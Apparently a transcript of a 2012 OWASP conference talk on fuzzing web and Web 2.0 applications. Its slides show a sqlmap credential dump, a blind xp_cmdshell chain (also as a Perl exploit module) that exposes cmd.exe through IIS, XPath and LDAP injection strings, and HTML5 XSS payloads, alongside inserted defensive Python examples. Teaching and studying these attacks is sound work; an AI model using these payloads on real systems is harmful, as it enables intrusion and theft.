1. FIND ME IF YOU CAN – SMART FUZZING AND
DISCOVERY
SHREERAJ SHAH
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
2. Who Are We?
http://shreeraj.blogspot.com
shreeraj@blueinfy.com
http://www.blueinfy.com
• Founder & Director
– Blueinfy Solutions Pvt. Ltd. (Brief)
– SecurityExposure.com
• Past experience
– Net Square, Chase, IBM & Foundstone
• Interest
– Web security research
• Published research
– Articles / Papers – Securityfocus, O'Reilly, DevX, InformIT etc.
– Tools – wsScanner, scanweb2.0, AppMap, AppCodeScan, AppPrint etc.
– Advisories - .Net, Java servers etc.
• Books (Author)
– Web 2.0 Security – Defending Ajax, RIA and SOA
– Hacking Web Services
– Web Hacking
3. Well Known Fact!
• 90% of sites are vulnerable to one or more vulnerabilities.
• Exploitable? – YES!
• Most popular ones are – SQLi & XSS
• SQLi – complete compromise of the application …
• XSS – Control over browser and exploitation
4. Traditional Fuzzing – Not working
• Enterprise running on the 2.0 wave – Portal
• Technologies & Components – Dojo, Ajax, XML Services, Blog, Widgets
• Scan with tools/products failed
• Security issues and hacks
– SQL injection over XML
– Ajax driven XSS
– Several XSS with Blog component
– Several information leaks through JSON fuzzing
– CSRF on both XML and JS-Array
» HACKED
» DEFENSE
5. AppSec – Past, Present …
Source - OWASP
6. Enterprise Technology Trend
• 2007. Web services would rocket from $1.6 billion in 2004 to $34 billion. [IDC]
• 2008. Web Services or Service-Oriented Architecture (SOA) would surge ahead.
• 2009. Enterprise 2.0 in action and penetrating deeper into the corporate environment.
• 2010. Flex/Cloud/API era.
• 2012. Mobile/HTML5 era.
7. Architecture
[Figure: Web 2.0 architecture. Browser side: HTML / JS / DOM, Ajax, RIA (Flash), RSS feeds, Web 2.0 start page; content sources such as documents, news, weather, mails and bank/trade reach the browser over the Internet. Application infrastructure side: web services end point, blog, database, authentication.]
8. Environment
[Figure: Deployment environment across the Internet, DMZ and trusted zones. The web client (browser, mobile, scripted application) talks SOAP/JSON etc. to the web server, which serves static pages only (HTML, HTM, etc.) and dynamic pages (ASP, DHTML, PHP, CGI, etc.); behind it sit the application server engine and integrated framework (ASP.NET on the .NET Framework, J2EE app server, web services, DB etc.), exposed as web services, and the internal/corporate network.]
9. Stack/Logic - Layers
[Figure: Client-side components (browser): HTML5, DOM, JS, XHR, WebSocket, Storage, WebSQL; Mobile: Android, iPhone/iPad, other; RIA: Flash, AMF, Flex, XAML, Silverlight, WCF, .NET. Server-side components: presentation layer, business layer, data access layer, authentication, communication etc., running on runtime, platform and operating system components.]
10. Browser & Mobile – Arch.
[Figure: Browser and mobile architecture, top to bottom. Presentation: HTML5 + CSS, Silverlight, Flash, APIs (Media, Geo etc.) & Messaging, plug-ins. Process & Logic: JavaScript, DOM/Events, Parser/Threads. Browser native services & network access: WebSQL, Cache, Storage, XHR 1 & 2, WebSocket, plug-in sockets, network. Core policies: SOP/CORS, Sandbox.]
11. Case study - Pageflakes
12. Case study - Pageflakes
Widgets
Web Services
22. JSON
message = {
    from : "john@example.com",
    to : "jerry@example.com",
    subject : "I am fine",
    body : "Long message here",
    showsubject : function(){document.write(this.subject)}
};
26. Attacker’s approach
• Fuzzing over HTTP
• Injecting faults with various sets of payloads
• Trying to raise an exception
• The exception message is thrown back as part of the HTTP response
• Scanning the response for signatures
• If a signature is found, it becomes an interesting entry point for exploitation
27. Challenges
• Technology fingerprinting
• Hidden calls
• Framework integration
• Entry points are multiple
• Traditional fuzzing will not work
• Auto assessment can be a challenge
• Behavioral assessment with artificial intelligence
28. Old Approach
• Forcing SQL errors.
• Ideal for identifying database interfaces!
http://192.168.7.120/details.asp?id='3
select * from items where product_id = '3
(query as it reaches the DB)
29. Error – Now? – forget it
• Premature SQL query termination
We now have an SQL injection point.
30. Blind SQL Injection
• We have an SQL injection point but it is not throwing any error message as part of its response. The application sends a customized error page which reveals no signature from which we can deduce a potential SQL flaw.
• Knowing the SQL injection point or loophole in the web application, xp_cmdshell seems to be working. But we can't say whether it is working or not, since it doesn't return any meaningful signature. This is "blind xp_cmdshell".
• The firewall doesn't allow outbound traffic, so we can't do ftp, tftp, ping etc. from the box to the Internet to confirm execution of the command on the target system.
• We don't know the actual path to the webroot, so we can't copy a file to a location that can be accessed over HTTP or HTTPS later to confirm execution of the command.
• If we know the path to the webroot and the directory structure but can't find execute permission on it, we can't copy cmd.exe or any other binary and execute it over HTTP/HTTPS.
32. Running tools
• SQL Map or Absinthe
D:\tools\sqlmap>sqlmap.py -b -u http://192.168.50.50/details.aspx?id=1
sqlmap/0.4 coded by inquis <bernardo.damele@gmail.com>
and belch <daniele.bellucci@gmail.com>
[*] starting at: 18:47:58
[18:48:00] [WARNING] the remote DMBS is not MySQL
[18:48:00] [WARNING] the remote DMBS is not PostgreSQL
remote DBMS: Microsoft SQL Server
banner:
---
Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86)
Oct 14 2005 00:33:37
Copyright (c) 1988-2005 Microsoft Corporation
Express Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
---
[*] shutting down at: 18:48:14
33. Enumeration…
D:\tools\sqlmap>sqlmap.py -b -u http://192.168.50.50/details.aspx?id=1 --dbs
sqlmap/0.4 coded by inquis <bernardo.damele@gmail.com>
and belch <daniele.bellucci@gmail.com>
[*] starting at: 18:53:10
[18:53:12] [WARNING] the remote DMBS is not MySQL
[18:53:12] [WARNING] the remote DMBS is not PostgreSQL
remote DBMS: Microsoft SQL Server
banner:
---
Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86)
Oct 14 2005 00:33:37
Copyright (c) 1988-2005 Microsoft Corporation
Express Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
---
available databases [9]:
[*] CmdExec_example
[*] Dashboard
[*] catalog
[*] demotrading
[*] master
[*] model
[*] msdb
[*] order
[*] tempdb
[*] shutting down at: 18:55:07
34. Enumeration…
D:\tools\sqlmap>sqlmap.py -u http://192.168.50.50/details.aspx?id=1 --tables -D catalog
sqlmap/0.4 coded by inquis <bernardo.damele@gmail.com>
and belch <daniele.bellucci@gmail.com>
[*] starting at: 18:59:21
[18:59:22] [WARNING] the remote DMBS is not MySQL
[18:59:22] [WARNING] the remote DMBS is not PostgreSQL
remote DBMS: Microsoft SQL Server
Database: catalog
[3 tables]
+--------------+
| auth |
| dtproperties |
| items |
+--------------+
35. Enumeration…
D:\tools\sqlmap>sqlmap.py -u http://192.168.50.50/details.aspx?id=1 --dump -D catalog -T auth
sqlmap/0.4 coded by inquis <bernardo.damele@gmail.com>
and belch <daniele.bellucci@gmail.com>
[*] starting at: 19:01:27
[19:01:28] [WARNING] the remote DMBS is not MySQL
[19:01:28] [WARNING] the remote DMBS is not PostgreSQL
remote DBMS: Microsoft SQL Server
Database: catalog
Table: auth
[3 entries]
+--------+------+---------+
| access | user | pass |
+--------+------+---------+
| 101010 | dbo | john123 |
| 110011 | | great |
| 001011 | | loveit |
+--------+------+---------+
36. Blind Exploiting
Set WshShell = WScript.CreateObject("WScript.Shell")
Set ObjExec = WshShell.Exec("cmd.exe /c echo %windir%")
windir = ObjExec.StdOut.ReadLine()
Set Root = GetObject("IIS://LocalHost/W3SVC/1/ROOT")
Set Dir = Root.Create("IIsWebVirtualDir", "secret")
Dir.Path = windir
Dir.AccessExecute = True
Dir.SetInfo
http://target/details.asp?id=1;exec+master..xp_cmdshell+'echo Set WshShell = WScript.CreateObject("WScript.Shell") > c:\secret.vbs'
…..
…..
…..
http://target/details.asp?id=1;exec+master..xp_cmdshell+'echo Dir.SetInfo >> c:\secret.vbs'
http://target/details.asp?id=1;exec+master..xp_cmdshell+'cscript+c:\secret.vbs'
37. Get the cmd.exe
• Run command over HTTP/HTTPS
• http://target/secret/system32/cmd.exe?+/c+set
38. Running…
sub Exploit {
    my $self = shift;
    my $target_host = $self->GetVar('RHOST');
    my $target_port = $self->GetVar('RPORT');
    my $path = $self->GetVar('RPATH');
    my $vhost = $self->GetVar('VHOST');
    my @url = split(/#/, $path);
    # each line of the VBScript shown on the "Blind Exploiting" slide is echoed
    # into c:\secret.vbs through xp_cmdshell, then the script is run with cscript
    my @payload = (
        "EXEC+master..xp_cmdshell+'echo+Set+WshShell+=+WScript.CreateObject(\"WScript.Shell\")>c:\\secret.vbs'",
        "EXEC+master..xp_cmdshell+'echo+Set+Root+=+GetObject(\"IIS://LocalHost/W3SVC/1/ROOT\")>>c:\\secret.vbs'",
        "EXEC+master..xp_cmdshell+'echo+Set+Dir+=+Root.Create(\"IIsWebVirtualDir\",\"secret\")>>c:\\secret.vbs'",
        "EXEC+master..xp_cmdshell+'echo+Dir.Path+=+\"c:\\winnt\\system32\">>c:\\secret.vbs'",
        "EXEC+master..xp_cmdshell+'echo+Dir.AccessExecute+=+True>>c:\\secret.vbs'",
        "EXEC+master..xp_cmdshell+'echo+Dir.SetInfo>>c:\\secret.vbs'",
        "EXEC+master..xp_cmdshell+'cscript+c:\\secret.vbs'"
    );
    $self->PrintLine("[+] Sending SQL injection payload...");
    for(my $count=0;$count<=6;$count++)
    ..
39. XPATH injection
• XPATH parsing standard error
• XPATH is a method available for XML parsing
• MS SQL Server provides an interface through which one can get table content in XML format.
• Once this is fetched one can run XPATH queries and obtain results.
• What if username/password parsing is done using XPATH – XPATH injection
40. XPATH injection
string fulltext = "";
string coString = "Provider=SQLOLEDB;Server=(local);database=order;User ID=sa;Password=mypass";
SqlXmlCommand co = new SqlXmlCommand(coString);
co.RootTag = "Credential";
co.CommandType = SqlXmlCommandType.Sql;
// the whole users table is pulled out of SQL Server as XML ...
co.CommandText = "SELECT * FROM users for xml Auto";
XmlReader xr = co.ExecuteXmlReader();
xr.MoveToContent();
fulltext = xr.ReadOuterXml();
XmlDocument doc = new XmlDocument();
doc.LoadXml(fulltext);
// ... and the login check is an XPath predicate built by concatenating the
// request's user and pass values straight into the expression (injectable)
string credential = "//users[@username='" + user + "' and @password='" + pass + "']";
XmlNodeList xmln = doc.SelectNodes(credential);
if (xmln.Count > 0)
{
    // True: a matching node exists, login succeeds
}
else
{
    // False
}
41. XPATH injection
string credential = "//users[@username='" + user + "' and @password='" + pass + "']";
• XPATH parsing can be leveraged by passing the following string: ' or 1=1 or ''='
• This always evaluates to true on the first node, so the user gets access as whoever the first user is.
Bingo!
42. LDAP Injection
Resource viewer:
http://www.something.com/res.cgi?type=1)(uid=*))
• Notice the injection
• Attacker bypasses the user id check
• (S)he can view all machines now
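An added example (not from the talk) of the filter construction behind such a resource viewer, in Python: the filter template, the caller's uid and the function names are assumptions. It shows what the directory server ends up evaluating with and without RFC 4515 escaping of the type value.

```python
# RFC 4515: these characters must be hex-escaped inside a filter value.
_LDAP_ESCAPES = {"\\": r"\5c", "*": r"\2a", "(": r"\28", ")": r"\29", "\x00": r"\00"}


def escape_filter_value(value: str) -> str:
    return "".join(_LDAP_ESCAPES.get(ch, ch) for ch in value)


# Hypothetical filter behind res.cgi: the resource type the user picked AND
# the caller's own uid, so a user should only see their own machines.
def resource_filter_vulnerable(res_type: str, uid: str) -> str:
    return f"(&(type={res_type})(uid={uid}))"


def resource_filter_safe(res_type: str, uid: str) -> str:
    return f"(&(type={escape_filter_value(res_type)})(uid={escape_filter_value(uid)}))"


def first_complete_filter(ldap_filter: str) -> str:
    """Return the prefix up to the first point where parentheses balance.
    Many servers evaluate just this part and ignore whatever follows, which
    is what lets the injected '(uid=*)' replace the real uid check."""
    depth = 0
    for i, ch in enumerate(ldap_filter):
        if ch == "(":
            depth += 1
        elif ch == ")":
            depth -= 1
            if depth == 0:
                return ldap_filter[: i + 1]
    return ldap_filter


if __name__ == "__main__":
    injected = "1)(uid=*))"  # the type value from the slide's res.cgi URL
    for build in (resource_filter_vulnerable, resource_filter_safe):
        f = build(injected, "alice")
        print(f"{build.__name__}: {f}")
        print(f"  evaluated: {first_complete_filter(f)}")
```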
43. SOAP – INJECTIONS & FUZZING
44. Fetching Calls
• Identifying services layer calls
45. Technology Identification
• Location can be obtained from UDDI as well, if already published.
• WSDL location [Access Point]: http://192.168.11.2/ws/dvds4less.asmx?wsdl
• .asmx indicates a .Net server from MS
46. SOAP request
<?xml version="1.0" encoding="utf-16"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<soap:Body>
<getProductInfo xmlns="http://tempuri.org/">
<id>1</id>
</getProductInfo>
</soap:Body>
</soap:Envelope>
(Slide annotations: the document is the SOAP Envelope; <getProductInfo> is the method call and <id> is the input to the method.)
47. SOAP response
<?xml version="1.0" encoding="utf-16"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<soap:Body>
<getProductInfoResponse xmlns="http://tempuri.org/">
<getProductInfoResult>/(1)Finding Nemo($14.99)/</getProductInfoResult>
</getProductInfoResponse>
</soap:Body>
</soap:Envelope>
(Slide annotations: the document is the SOAP Envelope; <getProductInfoResponse> is the method response and <getProductInfoResult> is the output of the method.)
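Added example (not from the talk): parsing the request and response above to identify the method call and its inputs, which is what "fetching calls" yields as fuzzing entry points, and building a request so that a fuzz value cannot alter the envelope's structure. The sample envelopes are constructed from the slides with the XML declaration omitted; function names are assumptions.

```python
import xml.etree.ElementTree as ET

SOAP_NS = "http://schemas.xmlsoap.org/soap/envelope/"

# Constructed from the slides' request and response (declaration omitted).
SAMPLE_REQUEST = """<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <getProductInfo xmlns="http://tempuri.org/"><id>1</id></getProductInfo>
  </soap:Body>
</soap:Envelope>"""
SAMPLE_RESPONSE = """<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <getProductInfoResponse xmlns="http://tempuri.org/">
      <getProductInfoResult>/(1)Finding Nemo($14.99)/</getProductInfoResult>
    </getProductInfoResponse>
  </soap:Body>
</soap:Envelope>"""


def _split(tag: str):
    """'{ns}local' -> (ns, local); unqualified tags give ('', local)."""
    ns, _, local = tag.rpartition("}")
    return ns.lstrip("{"), local


def parse_soap_call(envelope: str) -> dict:
    """Identify the method the Body invokes and its direct child parameters:
    each parameter is a fuzzing entry point, each result a field to inspect."""
    body = ET.fromstring(envelope).find(f"{{{SOAP_NS}}}Body")
    if body is None or len(body) == 0:
        raise ValueError("no method element inside soap:Body")
    ns, method = _split(body[0].tag)
    params = {_split(child.tag)[1]: (child.text or "") for child in body[0]}
    return {"method": method, "namespace": ns, "params": params}


def build_soap_call(method: str, namespace: str, params: dict) -> str:
    """Build a request; ElementTree serialises values as text, so a value
    such as '1</id><x>' stays a parameter value instead of new elements."""
    ET.register_namespace("soap", SOAP_NS)
    env = ET.Element(f"{{{SOAP_NS}}}Envelope")
    body = ET.SubElement(env, f"{{{SOAP_NS}}}Body")
    call = ET.SubElement(body, f"{{{namespace}}}{method}")
    for name, value in params.items():
        ET.SubElement(call, f"{{{namespace}}}{name}").text = str(value)
    return ET.tostring(env, encoding="unicode", default_namespace=namespace)


if __name__ == "__main__":
    print(parse_soap_call(SAMPLE_REQUEST))
    print(parse_soap_call(SAMPLE_RESPONSE))
    print(build_soap_call("getProductInfo", "http://tempuri.org/", {"id": "1</id><x>"}))
```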
48. HTML5 & CLIENT SIDE FUZZING
49. HTML5 – Tags/Attributes/Events
• Tags – media (audio/video), canvas (getImageData), menu, embed, buttons/commands, Form control (keys)
• Attributes – form, submit, autofocus, sandbox, manifest, rel etc.
• Events/Objects – Navigation (_self), Editable content, Drag-Drop APIs, pushState (History) etc.
50. HTML5 – XSS
• Blacklists and filters will get bypassed
• Lots of new signatures and possible ways to execute scripts
• XSS can be injected from tags and events
• New attributes are available for XSS payloads
51. XSS variants
• Media tags
• Examples
– <video><source onerror="javascript:alert(1)">
– <video onerror="javascript:alert(1)"><source>
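An added example, not from the talk, contrasting a tag blacklist with an allowlist sanitizer on the media-tag vectors above, in Python: the blacklisted tag set, the allowed tags and attributes, and the function names are assumptions. The blacklist knows nothing about <video>/<source>, so the payload passes through untouched; the allowlist keeps only named attributes per tag, so any on* handler is dropped whatever tag carries it.

```python
import re
from html import escape
from html.parser import HTMLParser

# Pre-HTML5 style blacklist: strips the tags that carried XSS before HTML5.
BLACKLIST_TAGS = ("script", "img", "iframe", "object", "embed")
_BLACKLIST_RE = re.compile(r"</?(?:%s)\b[^>]*>" % "|".join(BLACKLIST_TAGS), re.I)


def blacklist_filter(markup: str) -> str:
    return _BLACKLIST_RE.sub("", markup)


# Allowlist: unknown tags vanish, only listed attributes survive, and URLs
# must be http(s) or site-relative (no javascript: / data: schemes).
ALLOWED_ATTRS = {"p": set(), "b": set(), "i": set(), "a": {"href"},
                 "video": {"controls"}, "source": {"src", "type"}}
VOID_TAGS = {"source"}
_SAFE_URL = re.compile(r"^(?:https?:|/)", re.I)


class AllowlistSanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED_ATTRS:
            return  # drop unknown tags together with their attributes
        kept = []
        for name, value in attrs:
            value = value or ""
            if name not in ALLOWED_ATTRS[tag]:
                continue  # covers onerror/onload/... on any tag
            if name in ("href", "src") and not _SAFE_URL.match(value.strip()):
                continue  # blocks javascript: and data: URLs
            kept.append(f' {name}="{escape(value)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag in ALLOWED_ATTRS and tag not in VOID_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        self.out.append(escape(data))


def sanitize(markup: str) -> str:
    parser = AllowlistSanitizer()
    parser.feed(markup)
    parser.close()
    return "".join(parser.out)
```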
57. DOM based XSS - Messaging
• It is a sleeping giant in Ajax applications coupled with Web Messaging
• Root cause
– DOM is already loaded
– Application is single page and the DOM remains the same
– New information coming in needs to be injected using various DOM calls like eval()
– Information is coming from untrusted sources
– JSONP usage
– Web Workers and callbacks
58. AJAX with HTML5 – DOM
• An Ajax function makes a back-end call
• The back-end returns a JSON stream (or any other format) which gets injected into the DOM
• In some libraries the content type would allow it to be loaded in the browser directly
• In that case DOM processing is bypassed…
59. APIs …
• A few other HTML5 APIs are interesting from a security standpoint
– File APIs – allow local file access and can be mixed with ClickJacking and other attacks to gain client files.
– Drag-Drop APIs – exploiting self-XSS and a few other tricks, hijacking cookies …
– Lots more to explore and defend…